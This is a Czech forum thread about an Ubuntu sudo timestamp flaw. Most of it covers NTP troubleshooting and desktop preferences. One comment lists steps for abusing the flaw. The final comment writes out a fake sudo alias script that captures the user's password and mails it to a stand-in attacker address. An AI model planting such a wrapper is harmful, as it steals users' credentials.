Názory k článku
Ubuntu má už dva roky sudo zranitelné změnou času
-
Tam měl by běžet proces ntpd, tedy zkuste výpis příkazu:
ps aux | grep ntpdPřípadně, to už jako root:
ntpq -pnVýstup něco jako:
+195.113.144.201 .GPS. 1 u 797 1024 377 5.888 -0.266 0.027 *195.113.144.238 .GPS. 1 u 33 1024 377 4.027 0.419 0.105
(vypíše časové servery, které ntp používá pro synchronizaci)
Nebo je možné, že se používá systemd, takže služba systemd-timesyncd, takže opět zkuste najít proces.
Případně si nechte vypsat nastavení:
timedatectlLocal time: Tue 2015-05-05 15:22:45 CEST Universal time: Tue 2015-05-05 13:22:45 UTC RTC time: Tue 2015-05-05 13:22:45 Time zone: Europe/Prague (CEST, +0200) NTP enabled: yes NTP synchronized: yes RTC in local TZ: no DST active: yes Last DST change: DST began at Sun 2015-03-29 01:59:59 CET Sun 2015-03-29 03:00:00 CEST Next DST change: DST ends (the clock jumps one hour backwards) at Sun 2015-10-25 02:59:59 CEST Sun 2015-10-25 02:00:00 CET -
Hmmm, divné...
Nejspíš to celé nefunguje, protože, když to chci klikátkem zpátky zapnout, tak to hlásí "Unable to contact time server: pool.ntp.org." (a nejede to ani s žádnou jinou adresou) - téhle chyby je reportováno plno, jdu to hned zkoumatVýpisy jsou takovéto:
ps aux | grep ntpd
ntp 2337 0.0 0.0 33504 2112 ? Ss 20:13 0:00 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -u 105:110
ntpq -pn (roota nepotřebuji!), bez toho 'n' to vypisuje dost divné adresy...
x14@metatron:~ > sudo ntpq -pn remote refid st t when poll reach delay offset jitter ============================================================================== +77.78.107.252 195.113.144.201 2 u 8 64 377 10.075 1599.96 0.615 +46.243.51.34 195.113.144.201 2 u 8 64 377 11.901 1601.47 3.276 +37.157.199.158 116.49.102.213 2 u 62 64 377 14.810 1601.17 0.537 *46.243.52.222 195.113.144.201 2 u 10 64 377 10.656 1600.93 0.835 +91.189.89.199 193.79.237.14 2 u 1 64 377 45.236 1602.68 0.900 x14@metatron:~ > sudo ntpq -pn remote refid st t when poll reach delay offset jitter ============================================================================== +77.78.107.252 195.113.144.201 2 u 53 64 377 10.123 1599.85 160912. +46.243.51.34 195.113.144.201 2 u 54 64 377 11.901 1601.47 160911. +37.157.199.158 116.49.102.213 2 u 42 64 377 14.810 1601.17 160911. *46.243.52.222 195.113.144.201 2 u 54 64 377 10.656 1600.93 160911. +91.189.89.199 193.79.237.14 2 u 47 64 377 45.236 1602.68 160912. x14@metatron:~ > ntpq -p remote refid st t when poll reach delay offset jitter ============================================================================== mort.cihar.com 195.113.144.201 2 u 40 64 377 10.123 1599.85 278707. 46.243.51.34 195.113.144.201 2 u 43 64 377 11.440 427333. 359806. mail.poljakovi. 116.49.102.213 2 u 30 64 377 14.810 1601.17 278707. 46.243.52.222 195.113.144.201 2 u 45 64 377 10.656 1600.93 278708. golem.canonical 193.79.237.14 2 u 38 64 377 45.236 1602.68 278707. x14@metatron:~ > ntpq -p remote refid st t when poll reach delay offset jitter ============================================================================== mort.cihar.com 195.113.144.201 2 u 42 64 377 10.123 1599.85 278707. 46.243.51.34 195.113.144.201 2 u 45 64 377 11.440 427333. 359806. mail.poljakovi. 116.49.102.213 2 u 32 64 377 14.810 1601.17 278707. 46.243.52.222 195.113.144.201 2 u 47 64 377 10.656 1600.93 278708. golem.canonical 193.79.237.14 2 u 40 64 377 45.236 1602.68 278707. x14@metatron:~ > ntpq -pn remote refid st t when poll reach delay offset jitter ============================================================================== 77.78.107.252 195.113.144.201 2 u 45 64 377 10.123 1599.85 278707. 46.243.51.34 195.113.144.201 2 u 48 64 377 11.440 427333. 359806. 37.157.199.158 116.49.102.213 2 u 35 64 377 14.810 1601.17 278707. 46.243.52.222 195.113.144.201 2 u 50 64 377 10.656 1600.93 278708. 91.189.89.199 193.79.237.14 2 u 43 64 377 45.236 1602.68 278707. x14@metatron:~ > ntpq -4p remote refid st t when poll reach delay offset jitter ============================================================================== mort.cihar.com 195.113.144.201 2 u 21 64 377 10.471 427332. 160911. 46.243.51.34 195.113.144.201 2 u 19 64 377 11.394 427333. 160910. vps.poljakovi.c 116.49.102.213 2 u 5 64 377 15.256 427333. 160911. 46.243.52.222 195.113.144.201 2 u 23 64 377 11.400 427333. 160911. golem.canonical 193.79.237.14 2 u 16 64 377 44.992 427335. 160911. x14@metatron:~ > timedatectl Local time: Tue 2015-05-05 20:52:50 CEST Universal time: Tue 2015-05-05 18:52:50 UTC Timezone: Europe/Prague (CEST, +0200) NTP enabled: yes NTP synchronized: no RTC in local TZ: no DST active: yes Last DST change: DST began at Sun 2015-03-29 01:59:59 CET Sun 2015-03-29 03:00:00 CEST Next DST change: DST ends (the clock jumps one hour backwards) at Sun 2015-10-25 02:59:59 CEST Sun 2015-10-25 02:00:00 CET -
Když mně tu všechno funguje a co nefunguje, vím jak nastavit :-) že nefunguje to klikátko, jsem zjistil až teď a vůbec mě to nepálí, po restartu mi ty naschvál posunuté hodiny jedou zase správně...
Používal jsem snad všechny Windows – od 3.0, NT 3.51, teď mám v práci povinně 8.1... KDE je pro mě přirozené – třeba ten systém OK/Cancel, pozice tlačítek...
Ale nikdy neříkám nikdy – možná až se budu pekelně nudit a budu mít doma lahev dobrého vína :-) -
Kutloch (neregistrovaný)
Boze muj, a zkus ty vyvinout usili a prosim se zamyslet, ze "you are Simply The... Oldest" (skoro) na tomto portalu, tak uz te blikatka, odstiny, a dalsi efektni veci proste neberou. A popravde uz asi i na svoji sadu kbd zkratek sis zvyknul a jinudy cesta asi nepovede.
Me uz taky davno KDE nebere a taky na nej z vysoka seru, ale nemuzu mu napr. uprit, ze to je naprosto nejkonfigurovatelnejsi (a nejviceobhospodarovanejsejsisisi) desktop pro lidi zvykle konfigurovat system via klikani, za coz jim diky (pocinaje Xeroxem, Cpt. Uhurou, atd.).
-
Kristova noho, videl jsi kdy LXDE? Jake kbd zkratky? LXDE neni zadny tilling manager. A volba LXDE nema s vekem co delat. Volim LXDE proto, ze je to jeste celkem klikaci prostredi, kde se prave zadne kbz zkratky nemusim ucit. Rozdil oproti Xfce4 mi pripada minimalni. Rozdil oproti KDE je velky, ale zase nepatrim k tem, ktere bavi, kdyz na ne z kazdeho rohu vyskoci nejaka funkce, protoze bych to nepouzil a spis me to rusi. Clovek ani mys nezaparkuje do rohu, aby to nevedlo k nejake udalosti.
-
A mně se zase ty akce v rohu líbí a můžu si je v grafickým klikátku nastavit nebo třeba vypnout, což mám na televizi.
Akorát Plasma 5, která je v Kubuntu 15.04 je dost nedodělaná a chybí tam plno nastavení dostupných ve verzi 4. Ale pořád je to prostředí s nejširšíma možnostma nastavení vzhledu a běhá zcela svižně i na Celeronu J1900 s 2GB RAM.
Možná v budoucnu vyzkouším LxQt, ale zatím jsem na nic lepšího než KDE nenarazil.
-
nojo ... (neregistrovaný)
kdyz ono jarouskovi na TNS HC (http://cs.wikipedia.org/wiki/JZD_Slu%C5%A1ovice#Modely_TNS) KDE nejede, tak na nej brumla ;-)
-
Blaznis? TNS byly tak drahe, ze bych na nej nemel.
Mam HW, ktery, i kdyz to zdaleka neni posledni rev vypocetni techniky, by KDE jakztakz utahl. lo by to pouzivat. Ale za co, soudruzi, za co? Jen proto, abych ziskal efekty a funkce, ktere nepotrebuji, nechci, musel vypinat, protoze mi lezou na nervy a jeste abych snad kvuli nim cetl manual nebo neco? DE slouzi spousteni aplikaci a to LXDE zvlada k plne spokojenosti. Kdybych mel nejvykonnejsi stroj na trhu a v nem pameti, co se do nej vejde, zase by v nem skoncilo LXDE.
-
Tak to je sice hezke, ale i kdyby mela negativni cenu, tak je mi to na dve veci u netbooku, kam vic, jak 2 GB nejdou nacpat. Coz je u netbooku dost typicke, pricemz jsou i takove, kde je 1 GB naletovany rovnou na mobo a rozsirit to nejde (a debil vyrobce na to dava Widle 7 ze kteych by se na tom clovek posral). Pak je rada starsich stroju, kam take vic jak 2 GB nenarvu nebo se jedna o pameti, ktere se uz blbe shaneji, leda tak na ebay, kdyz ma clovek kliku a narazi na sluzneho proejce, ne na nejakeho sulina, ktery to prodava za ekvivalent vahy ve zlate. Poobne Crucial, kde take nevedi, co si za to rici.
-
Nemám sice žádné relevantní zkušenosti s ostatními GUI (mám za sebou Gnome2 a Unity), ale taky jsem příznivcem LXDE a rozhodně nepatřím ke starší generaci. Taky jsem do něj šel kvůli výkonu, ale teď mám kloudnou mašinu a z mainstreamových DE se mi dělá špatně. LXDE není med (než jsem jakž takž pohodlně rozjel dva displeje, docela jsem se zapotil), ale díky Openboxu je to skvěle konfigurovatelné, takže ani v GUI nemusím sáhnout na myš, všechno mám na zkratku, když se mi něco nezdá, tak v jednom konfiguráku přepíšu řádek a tradá. Hořící okna bych možná uvítal, ale za pohodlí při ovládání mi to nestojí. Ušetřené zdroje věnuju BOINCu nebo virtualizaci. A taky si myslím, že klikátka uživatele degenerují. Plně chápu, když na to nemáte čas nebo nervy, já si to ale radši naťukám přímo do konfiguráku, než abych všechno nastavoval kliknutím, neviděl to toho a pak když klikátko něco neumí zjistil, že konfigurák je pro jistotu binárka :/
-
nobody (neregistrovaný)
tak Xfce je jednak vykone (s moznosti txt/xml konfigurace) a rozhodne je to med ;)
-
Nevim, co jste mel s LXDE za potize. Ja dosud skoro vse naklikal a bylo. Na nastaveni displayu je klikatko, ovsem pokud toho clovek chce vice, nez zrcadleni displayu, musi sahnout po xrandr. Coz se mi podarilo rozchodit na notebooku za par minut na Google a mel jsem display notebooku jako rozsireni plochy monitoru nad nim a mohl jsem tahat okna mezi displayi. Ale vzhledem ke znacne rozlisnym velikostem tech displayu jsem to moc nepouzil a skoncil tim, ze kdyz sedim u monitoru, display notebooku vypnu a pouzivam jen monior.
-
Nerekl bych. Nevidim duvodu, proc by po uzivatel ke zmene systemoveho casu nemelo byt vyzadovano heslo. Vzhledem k dulezitosti systemoveho casu mi to pripada spise jako normalni pozadavek. Pokud to v nejake verzi Blbuntu je jinak, mel by za to nekdo byt verejne vykastrovan ostatnim pro vystrahu. Systemovy cas uzivatel moc casto nemeni, pokud ma ntp, tak ho nemeni vubec. Takze nejaka nadmerna prilezitost ani nema opodstatneni.
-
Karel (neregistrovaný)
Takových věcí, kde by bylo správné chtít po uživateli heslo roota, je více. Jenže pokud si uživatel zvykne, že to heslo musí zadávat každou chvíli do různých programů, tak si na to zvykne a bude ho zadávat bez rozmýšlení. Proto je snaha nekritické věci heslem roota nechránit, takže na uživatele bafne dialog s heslem jen několikrát za život a tudíž je větší pravděpodobnost, že ho to překvapí a donutí se zamyslet.
To jen tak na vysvětlení, proč je snaha se sudo v maximální možné míře vyvarovat. Osobně si také myslím, že zrovna systémový čas by heslo roota chtít měl, ale zároveň chápu, proč se autoři rozhodli ho tam (a nejen tam) nedat.
-
"Takových věcí, kde by bylo správné chtít po uživateli heslo roota, je více."
Rád vzpomínám na dobu, kdy neexistovalo sudo, user roota ani omylem nedostal a přesto neměl žádný problém s počítačem pracovat.
Fakt nevím, proč by jej měl user mít a proč vůbec potřebuje měnit systémový čas, který je stejně synchronizován přes ntpd, takže mu ta změna stejně neprojde.
Už vůbec mě nenapadá, proč by měl heslo roota (nebo přístup za uid 0) nastavovat do "různých programů".
-
Tak zrovna u systemoveho casu BFU friendly pristup moc nechapu. Systemovy cas prece user nikdy nenastavuje, pokud ano, je nekde neco blbe. Ja ho nenastavuju ani na RPi, ktere nema hodiny. User si nastavuje leda tak casove pasmo a na to roota nepotrebuje, to je jen kosmeticka uprava zobrazeni systemoveho casu.
-
Tany (neregistrovaný)
Je k tomu pseudodůvod - ve win to funguje.
Tam když už, ať se změnou času mění jen offset (vhodné pro časové zóny), nebo pro zhovadilosti typu mě jdou hodiny o pět minut napřed, aby jsem stíhal autobus.
Vlk se nažere a koza zůstane celá. Ve výsledku prostě bude mít člověk UTC+1:23, to ať je čas zobrazený uživateli, systém ať si pracuje s UTC, protože BFU je stejně houby do toho co systém dělá a ani ho to nezajímá.
-
1. V noci se priplizite k pocitaci, zabootujete live distro a ukradnete /ec/shadow
2. Cracknete uzivatelovo heslo pomoci vaseho clusteru NSA vykonu.
3. Zaskocite k pocitaci, pomoci ziskaneho hesla si vypisete obsah logu less /var/log/auth a zjistite posledni cas sudo.
4. Pomoci sudo prestelujete hodiny a honem, nez vam to ntpd zase nastavi zpet, pouzijete sudo bez hesla.Odmenou vam bude uspokojeni z toho, jaky jste drzny cracker.
-
ocb (neregistrovaný)
Uh-oh. Kreativita Vam rozhodne nechybi, nicmene cela situace nemusi byt takto pritazena za vlasy.
To ceho dosahnete jest nazyvano local privilege escalation, neboli z neprivilegovaneho uzivatele razem mate (skoro) roota.
Prekurzorem velikeho problemu v teto situaci tedy je remote code execution (tak treba onen shellshock).
Samozrejme, ze spolehlivost tohoto procesu je primo umerna bezpecnostni hygiene administratora -- proces, ktery ma korektne nastavena (dropnuta) prava,
je korektne izolovany/confinuty uvnitr vlastni domeny (SElinux - AppArmor je jina pisnicka - ale take klasicky DAC,pivot_rootuvnitr NS etc.)
nemluve vubec o tom, ze granularitasudoje mnohem lepsi nez pouha root-proxy.Zkratka a dobre, pointa je, ze na defualtni instalaci Ubunto Vam vetsinu casu staci local/remote code execution a roota dostanete od polkitu skoro zadarmo, zadne honeni kernel exploitu nebo buggy suid binarek ;)
-
Je to asi taková zranitelnost jako:
echo "alias sudo=/tmp/mysudo" >> ~/.bashrc
kde /tmp/mysudo je script na téma:
#!/bin/sh cat <<EOF We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things: #1) Respect the privacy of others. #2) Think before you type. #3) With great power comes great responsibility. [sudo] password for ondrej: EOF read -s PASSWORD echo $PASSWORD | mail -s "Sudo for $USER" hacka@big.hacka sleep 5 exec /usr/bin/sudo $@Jasně, že se banner vypíše i podruhé, ale:
1) kdo si toho všimne...
2) už je stejně pozděPokud se útočník dostane k odemčenému desktopu účtu, který má přístup na roota, tak je to jen variace na téma "jak dlouho to bude trvat"...
